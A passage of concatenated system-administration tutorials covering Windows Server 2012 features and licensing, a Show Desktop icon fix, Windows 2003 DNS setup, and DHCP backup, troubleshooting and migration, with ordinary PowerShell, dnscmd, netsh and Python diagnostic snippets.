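# Create an SMB share intended to host virtual machine files, granting the Hyper-V host's computer account full access
New-SmbShare -Name "VMStore" -Path "D:\VMStore" -FullAccess "DOMAIN\HYPERV-HOST$"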

Dynamic Access Control (DAC)

DAC is a central management system used to manage security permissions on files and folders. In a nutshell, DAC is a new and flexible way of setting up permissions on files and folders. With DAC, an administrator can classify data according to user claims, device claims and resource properties. Once data is classified, you can set up permissions to control user access to the classified data.

Storage Spaces

Storage Spaces is another new feature of Windows Server 2012. This feature pools different physical disks together and divides them into separate spaces, which are then used like regular disks. In the storage pool control panel (shown below), you can add any type or size of physical disk (e.g. SSD, SCSI, SATA, etc).  You can also configure mirroring, RAID redundancy and more.

Likewise, you can add storage at any time and the new capacity will automatically become available for use in the storage pool. Provisioning is also supported in Storage Spaces, allowing you to specify whether a new space should be thin or thick provisioned. With thin provisioning, disk space is allocated automatically on an as-needed basis, eliminating the need to occupy unnecessary disk space.

windows-2012-features-4-large Figure 4. Windows Server 2012 - Storage Space

Following are pointers on the main features provided by Storage Spaces (a short PowerShell sketch follows the list):

  • Obtain and easily manage reliable and scalable storage with reduced cost
  • Aggregate individual drives into storage pools that are managed as a single entity
  • Utilize simple inexpensive storage with or without external storage
  • Provision storage as needed from pools of storage you’ve created
  • Grow storage pools on demand
  • Use PowerShell to manage Storage Spaces for Windows 8 clients or Windows Server 2012
  • Delegate administration by specific pool
  • Use diverse types of storage in the same pool: SATA, SAS, USB, SCSI
  • Use existing tools for backup/restore as well as VSS for snapshots
  • Designate specific drives as hot spares
  • Automatic repair for pools containing hot spares with sufficient storage capacity to cover what was lost
  • Management can be local, remote, through MMC, or PowerShell
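
The following is a minimal PowerShell sketch of pooling the available physical disks and then carving a thinly provisioned, mirrored space out of the pool; the pool and disk names are hypothetical:

# Gather the physical disks that are eligible for pooling
$disks = Get-PhysicalDisk -CanPool $true

# Create a storage pool from those disks (hypothetical pool name)
New-StoragePool -FriendlyName "Pool01" -StorageSubSystemFriendlyName (Get-StorageSubSystem).FriendlyName -PhysicalDisks $disks

# Create a 500GB thin-provisioned, mirrored virtual disk inside the pool
New-VirtualDisk -StoragePoolFriendlyName "Pool01" -FriendlyName "Data01" -Size 500GB -ProvisioningType Thin -ResiliencySettingName Mirror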

DirectAccess

DirectAccess is Microsoft’s answer to VPN connectivity, allowing remote clients to access your network under an encrypted connection.  Thanks to its easy installation and improved friendly interface, administrators are able to quickly setup and manage VPN services on their Windows Server 2012 system. 

DirectAccess supports SSL (WebVPN) and IPSec protocols for VPN connections. A very interesting feature is the ‘Permanent VPN’ which allows mobile users to establish their VPN initially and then place it ‘on hold’ when their internet connectivity is lost.  The VPN session will then automatically resume once the user has Internet access again. 

This time-saving feature ensures VPN users experience a seamless VPN connection to the office, without the frustration of logging in every time Internet connectivity is lost, while also allowing other tasks to be automated in the background (e.g. remote backup of files).

Data Deduplication

Data Deduplication is a specialized data compression technique for eliminating duplicate copies of repeating data.  In the deduplication process, unique chunks of data, or byte patterns, are identified and stored during a process of analysis. As the analysis continues, other chunks are compared to the stored copy and whenever a match occurs, the redundant chunk is replaced with a small reference that points to the stored chunk. 

We should note that Data Deduplication is not only a Windows 2012 Server feature, but a technology supported by many vendors such as EMC, NetApp, Symantec and others.
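
On Windows Server 2012 deduplication is enabled per volume after adding the corresponding feature. A minimal PowerShell sketch (the drive letter is hypothetical) looks like this:

# Install the data deduplication feature and enable it on the D: volume
Install-WindowsFeature -Name FS-Data-Deduplication
Enable-DedupVolume -Volume "D:"

# Review the space savings once the optimization jobs have run
Get-DedupStatus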

Window-less Interface: CLI-Only Mode

Microsoft now supports running Windows Server 2012 without a graphical user interface (GUI). This means you can install and configure Windows Server 2012 with the GUI and, after finishing the setup, remove the GUI completely!  You also have the option of installing Windows Server 2012 without the GUI from the start.

Running your server without a GUI interface will help save valuable resources and also increase the system’s stability.
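
Removing the graphical shell after the initial setup comes down to a single PowerShell command, sketched below; the server reboots as part of the operation:

# Remove the graphical management tools and shell, converting the installation to Server Core
Uninstall-WindowsFeature -Name Server-Gui-Mgmt-Infra, Server-Gui-Shell -Restart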

IP Address Management (IPAM)

IPAM is a central IP address management tool for your entire network. IPAM can work with DNS and DHCP to better allocate, discover, issue, lease and renew IP addresses, and it gives a central view of where IP addresses are being used within your network.

Resilient File System (ReFS)

ReFS is Microsoft’s latest file system, capable of replacing the well-known NTFS file system. The main advantage of ReFS is automatic error correction (a verify and auto-correct process) regardless of the underlying hardware; ReFS uses checksums to detect and correct errors. The ReFS file system can support a maximum file size of 16 Exabytes (16.7 million TBytes!) and a maximum volume size of 1 Yottabyte (1.1 trillion TBytes).


Summary

Undoubtedly, Windows Server 2012 is packed with new features and additions designed to help organizations take advantage of cost-optimizing features like Hyper-V, Storage Spaces, PowerShell 3.0, Data Deduplication, SMB 3.0, the new Server Manager and others. Microsoft has also simplified the licensing schemes and introduced four editions of Server 2012: Foundation, Essentials, Standard and Datacenter. Follow this link to read our article covering Windows 2012 Server editions and licensing requirements.

 


Windows 2012 Server Foundation, Essential, Standard & Datacenter Edition Differences, Licensing & Supported Features.


Windows Server 2012 Editions

windows-2012On the 1st of August 2012, Microsoft released Windows Server 2012 – the sixth release of the Windows Server product family. On May 21st 2013, Windows Server 2012 R2 was introduced and is now the latest version of Windows Server on the market.  Microsoft has released four different editions of Windows Server 2012, varying in cost, licensing and features. These four editions of Windows Server 2012 R2 are: Windows 2012 Foundation edition, Windows 2012 Essentials edition, Windows 2012 Standard edition and Windows 2012 Datacenter edition.

Let’s take a closer look at each Windows Server 2012 edition and what they have to offer.

Users can also download the free Windows Server 2012 R2 Licensing Datasheet in our Windows Server Datasheets & Useful Resources download section. It provides a detailed overview of the licensing for Windows Server 2012 and contains extremely useful information on the various Windows Server 2012 editions, examples of how to calculate your licensing needs, the virtualization instances supported by every edition, server roles, common questions & answers, plus much more.

More technical articles covering Windows 2012 Server and Hyper-V Virtualization are available in our Windows 2012 Server section.

Windows Server 2012 Foundation Edition

This edition of Windows Server 2012 is targeted towards small businesses of up to 15 users. The Windows Server 2012 R2 Foundation edition comes pre-installed on a hardware server with a single physical processor and up to 32GB of RAM. The Foundation edition can be implemented in environments where features such as file sharing, printer sharing, security and remote access are required. Advanced server features such as Hyper-V, RODC (Read Only Domain Controller), data deduplication, dynamic memory, IPAM (IP Address Management), Server Core, the certificate services role, hot-add memory, Windows update services and failover clustering are not available in the Foundation edition.

Windows Server 2012 Essentials Edition

The Windows Server 2012 R2 Essentials edition is the next step up, geared towards small businesses of up to 25 users.  The Windows Server 2012 R2 Essentials edition is available in retail stores around the world, making it easy for businesses to install the new operating system without necessarily purchasing new hardware. Similar to the Foundation edition, the Essentials edition does not support many advanced server features; however, it does provide support for features such as Hyper-V, dynamic memory and hot add/remove RAM.

Windows Server 2012 R2 Essentials edition can run a single virtual machine instance on Hyper-V, a feature that was not available in the Windows Server 2012 Essentials (non-R2) edition. This single virtual machine instance can only be Windows Server 2012 R2 Essentials edition, seriously limiting the virtualization options but allowing companies to begin exploring the benefits of the virtualization platform.

Windows Server 2012 Standard Edition

The Windows Server 2012 R2 Standard edition is aimed at medium to large businesses that require additional features not present in the Foundation and Essentials editions. The Standard edition supports an unlimited number of users, as long as the required user licenses have been purchased.

Advanced features such as the certificate services role, Hyper-V, RODC (Read Only Domain Controller), IPAM (IP Address Management), data deduplication, Server Core, failover clustering and more are available in the Windows Server 2012 Standard edition. We should note that the Standard edition supports up to 2 virtual machines.

Windows Server 2012 Datacenter Edition

The Windows Server 2012 R2 Datacenter edition is the flagship product created to meet the needs of medium to large enterprises. The major difference between the Standard and Datacenter edition is that the Datacenter edition allows the creation of unlimited Virtual Machines and is therefore suitable for environments with extensive use of virtualization technology.

Before purchasing the Windows Server 2012 operating system, it is very important to understand the differences between the various editions. The table below shows the differences between the four editions of Windows Server 2012:


Editions | Foundation | Essentials | Standard | Datacenter
Distribution | OEM Only | Retail, volume licensing, OEM | Retail, volume licensing, OEM | Volume licensing and OEM
Licensing Model | Per Server | Per Server | Per CPU pair + CAL/DAL | Per CPU pair + CAL/DAL
Processor Chip Limit | 1 | 2 | 64 | 64
Memory Limit | 32GB | 64GB | 4TB | 4TB
User Limit | 15 | 25 | Unlimited | Unlimited
File Services Limits | 1 standalone DFS root | 1 standalone DFS root | Unlimited | Unlimited
Network Policy & Access Services Limits | 50 RRAS connections and 10 IAS connections | 250 RRAS connections, 50 IAS connections, and 2 IAS Server Groups | Unlimited | Unlimited
Remote Desktop Services Limits | 50 Remote Desktop Services connections | Gateway only | Unlimited | Unlimited
Virtualization Rights | n/a | Either in 1 VM or 1 physical server, but not both at once | 2 VMs | Unlimited
DHCP, DNS, Fax Server, Printing, IIS Services | Yes | Yes | Yes | Yes
Windows Server Update Services | No | Yes | Yes | Yes
Active Directory Services | Yes, must be root of forest and domain | Yes, must be root of forest and domain | Yes | Yes
Active Directory Certificate Services | Certificate Authorities only | Certificate Authorities only | Yes | Yes
Windows PowerShell | Yes | Yes | Yes | Yes
Server Core Mode | No | No | Yes | Yes
Hyper-V | No | No | Yes | Yes

Windows  Server 2012 Licensing - Understanding Client Access License (CAL) & Device Access License (DAL) Licensing Models

The Standard and Datacenter editions of Server 2012 support the Client Access License (CAL) or Device Access License (DAL) licensing model. A CAL is assigned to a user whereas a DAL is assigned to a device (computer). For example, a CAL assigned to a user allows only that user to access the server, via any device. Likewise, if a DAL is assigned to a particular device, then any authenticated user using that device is allowed to access the server.

We can use a simple example to help highlight the practical differences between CAL and DAL licensing models and understand the most cost-effective approach:

Assume an environment with Windows Server 2012 R2 Standard edition and a total of 50 users and 25 devices (workstations). In this case, we can purchase either 50 CAL licenses to cover our 50 users or, alternatively, 25 DAL licenses to cover the total number of workstations that need to access the server. In this scenario, purchasing DALs is the more cost-effective solution.

If, however, we had 10 users with a total of 20 devices, e.g. 2 devices per user (workstation & laptop), then it would be more cost-effective to purchase 10 CAL licenses.

Windows Server 2012 Foundation Edition Licensing Model

Windows Server 2012 Foundation is available to OEMs (Original Equipment Manufacturers) only and therefore can only be purchased at the time of purchasing a new hardware server. The Windows 2012 Foundation edition supports up to 15 users, and CALs or DALs are not required for Foundation edition servers. In addition, Foundation edition owners cannot upgrade to other editions. The maximum number of SMB (Server Message Block, or file sharing) connections to the server is 30. Similarly, the maximum number of RRAS (Routing and Remote Access Service) and RDS (Remote Desktop Service) connections is 50.

Windows Server 2012 Essentials Edition Licensing Model

The Essentials edition of Server 2012 is available to OEMs (with the purchase of new hardware) and also at retail stores. The user limit of this edition is 25 and the device limit is 50. This means that a maximum of 25 users across 50 computers can access the Windows Server 2012 Essentials edition; for example, 20 users could rotate randomly amongst 25 computers accessing the Server 2012 Essentials edition without any problem. CALs or DALs are not required for the Windows Server 2012 Essentials edition because no more than 25 users can access the server.

 A common question at this point is what if the organization expands and increases its users and computers?

In these cases Microsoft provides an upgrade path, allowing organizations to purchase a Windows Server 2012 Standard or Datacenter edition license and perform an in-place license transition. Once the transition is complete, the user limitation is lifted and other features are unlocked, without requiring migration or reinstallation of the server.

Companies upgrading to a higher edition of Windows 2012 Server should keep in mind that it will be necessary to purchase the required amount of CALs or DALs according to their users or devices.

Administrators will be happy to know that it is also possible to downgrade the Standard edition of Server 2012 to the Essentials edition. For example, it is possible to run the Essentials edition of Server 2012 as a virtual machine utilizing one of the two virtual instances available with the Standard edition. This eliminates the need to purchase the Essentials edition of Server 2012.


With the release of Windows Server 2012 Essentials R2, Microsoft has updated its licensing model. Unlike Windows Server 2012 Essentials (non-R2), you can now run a single instance of a virtual machine.

The Hyper-V role and Hyper-V Manager console are now included with Windows Server 2012 R2 Essentials. The server licensing rights have been expanded, allowing you to install an instance of Essentials on your physical server to run the Hyper-V role (with none of the other roles and features of the Essentials Experience installed), and a second instance of Essentials as a virtual machine (VM) on that same server with all the Essentials Experience roles and features.

Windows Server 2012 Standard Edition & Datacenter Edition Licensing Model

The licensing of the Standard and Datacenter editions is based on sockets (CPUs) plus CALs or DALs. A socket is defined as a CPU, or physical processor; logical cores are not counted as sockets. A single Standard or Datacenter edition license covers up to two physical processors per physical server. CAL or DAL licenses are then required so that clients/devices can access the Windows server. The Standard edition allows up to 2 virtual instances, while the Datacenter edition allows an unlimited number of virtual instances.

For example, a Windows 2012 Server R2 Standard edition installed on a physical server with one socket (CPU) can support up to two instances of virtual machines. These virtual machines can be Server 2012 R2 Standard or Essentials edition. Similarly, if you install a Windows Server 2012 R2 Datacenter edition, then you can install an unlimited number of virtual machines.

Let’s look at some examples on deploying Standard and Datacenter edition servers and calculating the licenses required:

Scenario 1: Install Server 2012 Standard/Datacenter Edition on a server box with four physical processors and 80 users.

In this scenario, we will be required to purchase two Standard/Datacenter Edition licenses because a single license covers up to two physical processors, plus 80 CAL licenses so our users can access the server resources.

Scenario 2: Install Server 2012 Standard Edition on a physical server with 1 physical processor, running 8 instances of virtual machines. A total of 50 users will be accessing the server.

Here, four Server 2012 Standard edition licenses are required and 50 CALs or DALs. Remember that a single Standard edition license covers up to two physical processors and up to two instances of virtual machines. Since the requirement is to run 8 instances of virtual machines, we need four Standard edition licenses.

If we decided to use the Datacenter edition in this scenario, a single license with 50 CAL would be enough to cover our needs, because the Datacenter edition license supports an unlimited number of virtual instances and up to two physical processors.

Summary

Microsoft’s Windows Server 2012 is an attractive server-based product designed to meet the demands of small to large enterprises and has a very flexible licensing model. It is very important to fully understand the licensing options and supported features on each of the 4 available editions, before proceeding with your purchase – a tactic that will help ensure costs are kept well within the allocated budget while the company’s needs are fully met.


How to Recover & Create "Show Desktop" Icon Function on Windows 7, Vista, XP and 2000


Windows show desktop iconThe Show Desktop feature, included with almost all versions of Windows up to Windows 7, allows a user to minimize or restore all open programs and easily view the desktop. To use this feature, a user simply clicks Show Desktop on the Quick Launch toolbar to the right of the taskbar.

A common problem amongst Windows users is that the Show Desktop icon can accidentally be deleted, thus losing the ability to minimize all open programs and reveal your desktop.

This short article will explain how you can recover and recreate the Show Desktop icon and restore this functionality. The instructions included are valid for the Windows 95, 98, 2000, XP, Windows Vista and Windows 7 operating systems.

To recreate the Show Desktop icon, follow these steps:

1) Click on Start, Run, type Notepad and click on OK or Hit Enter. Alternatively, open the Notepad application.

2) Carefully copy and paste the following text into the Notepad window:

  [Shell]
  Command=2
  IconFile=explorer.exe,3
  [Taskbar]
  Command=ToggleDesktop

On the File menu, click Save As, then save the file to your desktop as Show desktop.scf. The Show Desktop icon is now created on your desktop.

 3) Finally, click and drag the Show Desktop icon to your Quick Launch toolbar.

Windows 2003 DNS Server Installation & Configuration

DNS is used for translating host names to IP addresses and the reverse, for both private and public networks (i.e.: the Internet). DNS does this by using records stored in its database. On the Internet DNS mainly stores records for public domain names and servers whereas in private networks it may store records for client computers, network servers and data pertaining to Active Directory.

In this article, we will install and configure DNS on a standalone Windows Server 2003. We will begin by setting up a cache-only DNS server and progress to creating a primary forward lookup zone, a reverse lookup zone, and finally some resource records. At the end of this article we will have set up a DNS server capable of resolving internal and external host names to IP addresses and the reverse.

Install DNS on Windows Server 2003

Before installing and configuring DNS on our server we have to perform some preliminary tasks. Specifically, we have to configure the server with a static IP address and a DNS suffix. The suffix will be used to fully-qualify the server name. To begin:

1. Go to Start > Control Panel > Network Connections, right-click Local Area Connection and choose Properties.

2. When the Local Area Connection Properties window comes up, select Internet Protocol (TCP/IP) and click Properties. When the Internet Protocol (TCP/IP) window comes up, enter an IP address, subnet mask and default gateway IP address that are all compatible with your LAN.

Our LAN is on a 192.168.1.0/24 network, so our settings are as follows:

tk-windows-dns-p1-1

3. For the Preferred DNS Server, enter the loopback address 127.0.0.1. This tells the server to use its own DNS server service for name resolution, rather than using a separate server. After filling out those fields, click the Advanced button.

4. When the Advanced TCP/IP Settings window comes up, click the DNS tab, enter firewall.test in the DNS suffix for this connection text field, check Register this connection's address in DNS, check Use this connection's DNS suffix in DNS registration, and click OK, OK, and then Close:

tk-windows-dns-p1-2

 

Now that we have configured our server with a static IP address and a DNS suffix, we are ready to install our DNS Server. To do this:

1. Go to Start > Control Panel > Add or Remove Programs.

2. When the Add or Remove Program window launches, click Add/Remove Windows Components on the left pane.

3. When the Windows Components Wizard comes up, scroll down and highlight Networking Services and then click the Details button.

4. When the Networking Services window appears, place a check mark next to Domain Name System (DNS) and click OK and OK again.

 

tk-windows-dns-p1-3

Note that, during the install, Windows may generate an error claiming that it could not find a file needed for DNS installation. If this happens, insert your Windows Server 2003 CD into the server's CD-ROM drive and browse to the i386 directory. The wizard should automatically find the file and allow you to select it. After that, the wizard should resume the install.

After this, DNS should be successfully installed. To launch the DNS MMC, go to Start > Administrative Tools > DNS

tk-windows-dns-p1-4

As our DNS server was just installed it is not populated with anything. On the left pane of the DNS MMC, there is a server node with three nodes below it, titled Forward Lookup Zones, Reverse Lookup Zones and Event Viewer.

The Forward Lookup Zones node stores zones that are used to map host names to IP addresses, whereas the Reverse Lookup Zones node stores zones that are used to map IP addresses to host names.

Setting Up a Cache-Only DNS Server

A cache-only DNS server contains no zones or resource records. Its only function is to cache the answers to queries that it processes; that way, if the server receives the same query again later, it simply returns the cached response rather than going through the recursion process again, thereby saving time. With that said, our newly installed DNS server is already a cache-only DNS server!

Creating a Primary Forward Lookup Zone

With its limited functionality, a cache-only DNS server is best suited for a small office environment or a small remote branch office. However, in a large enterprise where Active Directory is typically deployed, more features are needed from a DNS server, such as the ability to store records for computers, servers and Active Directory. The DNS server stores those records in a database, or zone.

DNS has a few different types of zones, and each has a different function. We will first create a primary forward lookup zone titled firewall.test. We do not want to name it firewall.cx, or any variation that uses a valid top-level domain name, as this would potentially disrupt the clients' ability to access the real websites for those domains.

1. On the DNS MMC, right-click the Forward Lookup Zones node and choose New Zone.

2. When the New Zone Wizard comes up, click Next.

3. On the Zone Type screen, make sure that Primary zone is selected and click Next.

4. On the Zone Name screen, type firewall.test.

5. On the Zone File screen, click Next.

6. On the Dynamic Update screen, make sure that “Do not allow dynamic updates” is selected and click Next.

7. On the next screen, click Finish.

We now have a foundation that we can place resource records in for name resolution by internal clients.
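
For reference, the same primary forward lookup zone can also be created from the command prompt using the dnscmd utility included with the Windows Server 2003 DNS tools. This is only a sketch of the equivalent command:

C:\> dnscmd /zoneadd firewall.test /primary /file firewall.test.dns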

Creating a Primary Reverse Lookup Zone

Contrary to the forward lookup zone, a reverse lookup zone is used by the DNS server to resolve IP addresses to host names. Not as frequently used as forward lookup zones, reverse lookup zones are often used by anti-spam systems in countering spam and by monitoring systems when logging events or issues. To create a reverse lookup zone:

1. On the DNS MMC, right-click the Reverse Lookup Zones node and choose New Zone.

2. When the New Zone Wizard comes up, click Next.

3. On the Zone Type screen, make sure that Primary zone is selected and click Next.

4. On the Reverse Lookup Zone Name screen, enter 192.168.1 and click Next.

5. On the Zone File screen, click Next.

6. On the Dynamic Update screen, make sure that “Do not allow dynamic updates” is selected and click Next.

7. On the next screen, click Finish.

tk-windows-dns-p1-5

There is now a reverse lookup zone titled 192.168.1.x Subnet on the left pane of the DNS MMC. This will be used to store PTR records for computers and servers in that subnet.

Using the instructions above, go ahead and create two additional reverse lookup zones: one for a 192.168.2.x subnet and one for a 192.168.3.x subnet.

Creating Resource Records

DNS uses resource records (RRs) to tie host names to IP addresses and the reverse. There are different types of resource records, and the DNS server will respond with the record that is requested in a query.

The most common resource records are: Host (A); Mail Exchanger (MX); Alias (CNAME); and Service Location (SRV) for Active Directory zones. As such, we will create all but the SRV records, because Active Directory will create those automatically (a command-line equivalent is sketched after these steps):

1. On the DNS MMC, expand the Forward Lookup Zones node followed by the firewall.test zone.

2. Right-click the firewall.test zone and choose Other New Records.

3. On the Resource Record Type window, select Host (A) and click Create Record.

4. On the New Resource Record window, type “webserver001” in the Host text field, type “192.168.2.200” in the IP address text field, check the box next to “Create associated pointer (PTR) record” and click OK.

This tells DNS to create a PTR record in the appropriate reverse lookup zone. And, for demonstration purposes, it does not matter whether this server actually exists or not.

5. Back at the Resource Record Type window, select Host (A) again and click Create Record.

6. On the New Resource Record window, type “mailserver001” in the Host text field and type “192.168.3.200” in the IP address text field. Make sure that the check box next to “Create associated pointer (PTR) record” is checked and click OK. A corresponding PTR record will be created in the appropriate reverse lookup zone.

7. Back at the Resource Record Type window, select Alias (CNAME) and click Create Record.

8. On the New Resource Record window, type “www” in the Alias name text field, then click Browse.

9. On the Browse window, double-click the server name, then double-click Forward Lookup Zones, then double-click firewall.test, and finally double-click webserver001. This should populate webserver001's fully qualified domain name in the Fully qualified domain name (FQDN) for target host text field. Click OK afterwards.

10. Back at the Resource Record Type window, select Mail Exchanger (MX) and click Create Record.

11. On the New Resource Record window, click Browse, double-click the server name, then double-click Forward Lookup Zones, then double-click firewall.test, and finally double-click mailserver001. This should populate mailserver001's fully qualified domain name in the Fully qualified domain name (FQDN) of mail server text field. Click OK afterwards.

12. Back at the Resource Record Type window, click Done.
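
The equivalent records can also be created from the command prompt with dnscmd; the commands below are a sketch using the same names and IP addresses as the steps above:

C:\> dnscmd /recordadd firewall.test webserver001 A 192.168.2.200
C:\> dnscmd /recordadd firewall.test mailserver001 A 192.168.3.200
C:\> dnscmd /recordadd firewall.test www CNAME webserver001.firewall.test.
C:\> dnscmd /recordadd firewall.test @ MX 10 mailserver001.firewall.test.

Note that, unlike the wizard's “Create associated pointer (PTR) record” option, the A record commands above do not add the matching PTR records, so those would need to be added to the reverse lookup zones separately.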

Summary

Our standalone Windows Server 2003 DNS server now has a primary forward lookup zone, a primary reverse lookup zone, and multiple resource records. As a standard function, it will also cache the answers to queries that it has already resolved.


Windows 2003 DHCP Server Advanced Configuration - Part 2

Part 1 of our Windows 2003 DHCP Server Advanced Configuration article explained the creation and configuration of DHCP Scope options and how to configure various DHCP server settings. This article focuses on backing up and restoring the DHCP server database, troubleshooting DHCP using a packet analyser and more.

Backing up the DHCP database

Our DHCP server is fully functional but it may not always remain that way. We definitely want to back it up so we can quickly restore the functionality in the event of a disaster.

The DHCP scopes, settings and configuration are actually kept in a database file, and the database is automatically backed up every 60 minutes. But to manually back it up:

  • On the DHCP MMC, right-click the server node and choose Backup
  • When the Browse for Folder window comes up, verify that it points to C:\windows\system32\dhcp\backup and click OK:

tk-windows-dhcp-2k3-advanced-12

Restoring the DHCP Database

Let us imagine that a disaster with the DHCP server did occur and that we now have to restore the DHCP functionality. Restoring the DHCP database is just as simple as backing it up:

  1. On the DHCP MMC, right-click the server node and choose Restore
  2. When the Browse for Folder window comes up, click OK
  3. You will receive a prompt informing you that the DHCP service will need to be stopped and restarted for the restore to take place. Click OK

The DHCP database will then be restored.

Troubleshooting DHCP

Let us imagine that, after restoring the database, the DHCP server developed some issues and started malfunctioning. Luckily, DHCP comes equipped with several tools to help us troubleshoot.

Event Viewer

The Event Viewer displays events that the server has reported and whether those events represent actual issues or normal operation. Most of the issue events related to DHCP will be reported in the System log of the Event Viewer with a Source of DHCPServer.

To view the Event Viewer:

  1. Go to Start > Administrative Tools > Event Viewer
  2. When the Event Viewer window comes up, click the System log on the left pane and its events will be displayed on the right pane.

Depending on how active the server is, the System log may be cluttered with Information, Warning and Error events that are unrelated to DHCP. To see only DHCP issues, filtering non-important events is necessary. To do this:

  1. Go to View > Filter
  2. When the System Properties window comes up, click on the Event Source drop-down menu and select DHCPServer. This tells the log to display only DHCP server events.
  3. Next, uncheck the box next to Information. This tells the log to display only events regarding issues.
  4. (Optional) On the From and To drop-down menus at the bottom, adjust the time and date range to when an issue was suspected to have occurred.
  5. When finished, click OK

The System log is now displaying only DHCP Warning and Error events. This should cause any DHCP-related issues to stick out:

tk-windows-dhcp-2k3-advanced-13

Every event has an Event ID. In case a particular event's description is too vague to understand, you may have to research the Event ID for further clarification.
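
Where Windows PowerShell is available (for example on a newer server or a management workstation), the same filtered view can be pulled from the command line. The sketch below lists recent Warning and Error events logged by the DHCPServer source:

Get-EventLog -LogName System -Source DHCPServer -EntryType Warning, Error -Newest 25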

DHCP Audit Logs

Another DHCP troubleshooting tool is the DHCP audit logs. These logs display detailed information about what the DHCP server has been doing. If a client leases an IP address, renews its IP address, or releases its IP address, the DHCP server will audit this activity.

More concerning events are also audited: if the DHCP server service stops, encounters a rogue DHCP server in the network, or fails to start, the server will audit this issue as well. These logs provide closer visibility into what the DHCP server is doing.

To access the DHCP audit logs:

  1. Go to Start > Run
  2. When the Run box comes up, type c:\windows\system32 and click OK
  3. When the System32 folder comes up, navigate to and double-click the dhcp folder.

In the dhcp folder, the log files will be titled DhcpSrvLog-%WeekDay%.log, where %WeekDay% is a day of the week. There should be one log file for each recent day of the week.

tk-windows-dhcp-2k3-advanced-14

The log may appear overwhelming, but it is very simple to read. Each line contains several pieces of information but the most important is the code at the beginning of the line, since that describes what is being audited. That code is defined on the top portion of the log file. As each line is comma-separated you can actually save the log file in .csv format and open it in Excel for easier and more convenient reading and analysis.
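Because the format is that regular, the log can also be read programmatically. Below is a minimal Python sketch, assuming the default comma-separated layout described in the log header (ID, Date, Time, Description, IP Address, Host Name, MAC Address); the file name and path are only examples and should be adjusted to your server:

# Minimal sketch: print lease-related events from a DHCP audit log.
# Assumes the default layout documented at the top of the log file:
#   ID,Date,Time,Description,IP Address,Host Name,MAC Address
import csv
from pathlib import Path

LOG = Path(r"C:\Windows\System32\dhcp\DhcpSrvLog-Mon.log")   # example path

with LOG.open(newline="") as f:
    for row in csv.reader(f):
        # The explanatory header block is skipped; data lines start with a numeric ID.
        if not row or not row[0].strip().isdigit():
            continue
        event_id, date, time, desc = row[0], row[1], row[2], row[3]
        ip = row[4] if len(row) > 4 else ""
        host = row[5] if len(row) > 5 else ""
        print(f"{date} {time}  [{event_id}] {desc:30} {ip:15} {host}")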

Protocol Analyzer

Although a Network protocol analyzer is not an official DHCP troubleshooting tool, it is nonetheless an excellent tool for troubleshooting issues where the server is not servicing clients. In such situations you would use the protocol analyzer on the server to determine whether DHCP Discover/Request packets from clients are arriving at the server at all or if they are arriving but being ignored by the server.

If you find that the packets are not arriving at the server at all, you would have isolated the problem to most likely being a routing issue or an issue with any relay agents/configured IP helpers in the network.

However, if you find that the packets are arriving but being ignored by the server, then you would have isolated the problem to either residing on the server or the configuration of DHCP.
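If a full protocol analyzer is not at hand, a rough version of the same check can be scripted. The minimal Python sketch below listens on UDP port 67 and reports any DHCP Discover or Request packets it sees; run it on a test host, or on the server with the DHCP service temporarily stopped, since the service itself already owns that port:

# Minimal sketch: report DHCP Discover/Request packets arriving on UDP/67.
import socket

MSG_TYPES = {1: "Discover", 3: "Request"}   # DHCP option 53 values

def dhcp_message_type(data):
    # Options start after the 236-byte BOOTP header and the 4-byte magic cookie.
    if len(data) < 240 or data[236:240] != b"\x63\x82\x53\x63":
        return None
    i = 240
    while i < len(data):
        tag = data[i]
        if tag == 0:        # pad option
            i += 1
            continue
        if tag == 255:      # end of options
            break
        length = data[i + 1]
        if tag == 53 and length == 1:
            return data[i + 2]
        i += 2 + length
    return None

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("", 67))
print("Waiting for DHCP traffic on UDP/67 ...")
while True:
    data, (src_ip, src_port) = sock.recvfrom(2048)
    mtype = dhcp_message_type(data)
    if mtype in MSG_TYPES:
        print(f"{MSG_TYPES[mtype]} received from {src_ip}:{src_port}")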

The screen shot below, of Wireshark, shows that the server received a DHCP Discover packet from a client and properly responded to it.

tk-windows-dhcp-2k3-advanced-15

DHCP Migration

Continuing from our previous storyline, let us pretend that we found the issue that was affecting our DHCP server but to fix it we would have to take the DHCP server offline for a considerable amount of time, so for the time being we will simply set up a different server as our DHCP server.

To accomplish this, we will have to transfer the DHCP database to our new server. Migrating the DHCP database is not only done in situations such as this. When a DHCP server is decommissioned, for example, you would need to transfer the DHCP database to the new server.

Although the transfer can technically be done in more than one way, presented below is one method. Regardless of the approach chosen, you should aim to minimize the amount of time that both DHCP servers are simultaneously active and able to service clients as this would increase the chances of one server leasing an IP address that is already in use.

  1. On the old server, go to Start > Run , type cmd , and click OK .
  2. When the Command Prompt window comes up, type netsh dhcp server export c:\dhcp_backup.txt all and hit Enter. This command exports all the scopes in the DHCP database to a file titled dhcp_backup.txt .
  3. Copy the export file ( dhcp_backup.txt ) to the new server.
  4. On the new server, install the DHCP server role. Do not authorize the DHCP server yet.
  5. On the new server, go to Start > Run , type cmd , and click OK .
  6. When the Command Prompt window comes up, type netsh dhcp server import c:\dhcp_backup.txt all and hit Enter. This command imports all the scopes in the DHCP database from the file titled dhcp_backup.txt .
  7. On the new server, enable conflict detection so IP addresses that have been leased out by the old server since the start of the migration are not reissued.

a. On the DHCP MMC, right-click the server node and choose Properties

b. When the Properties window comes up, click the Advanced tab.

c. On Conflict Detection Attempts , increase the number to 2 just to be safe. This tells the server to ping an IP address before it assigns it; if there is a response, the DHCP server will not lease out that IP address since it is already in use (a minimal sketch of this check appears after these steps).

d. Click OK

8. On the new server, authorize the DHCP server.

9. On the old server, unauthorize the DHCP server.

Although we could perform a migration by simply backing up the DHCP database on the old server using the backup procedure and restoring it on the new server using the restore procedure, this approach also restores the old DHCP server's configuration settings, such as audit settings, conflict detection settings, DDNS settings, etc. It may not always be desirable to transfer those settings in a migration. The procedure described above only transfers the scopes and their settings.
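As a side note, the conflict detection we enabled in step 7 boils down to pinging a candidate address before handing it out. The short Python sketch below illustrates the same check; the ping flags are the Windows ones and the candidate addresses are only examples:

# Sketch of what conflict detection amounts to: ping an address before
# treating it as free. Uses Windows ping flags (-n count, -w timeout in ms).
import subprocess

def appears_in_use(ip):
    result = subprocess.run(["ping", "-n", "1", "-w", "1000", ip],
                            capture_output=True)
    return result.returncode == 0   # a reply means the address is already taken

for candidate in ("192.168.0.10", "192.168.0.11"):
    print(candidate, "in use - skip" if appears_in_use(candidate) else "free")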

Conclusion

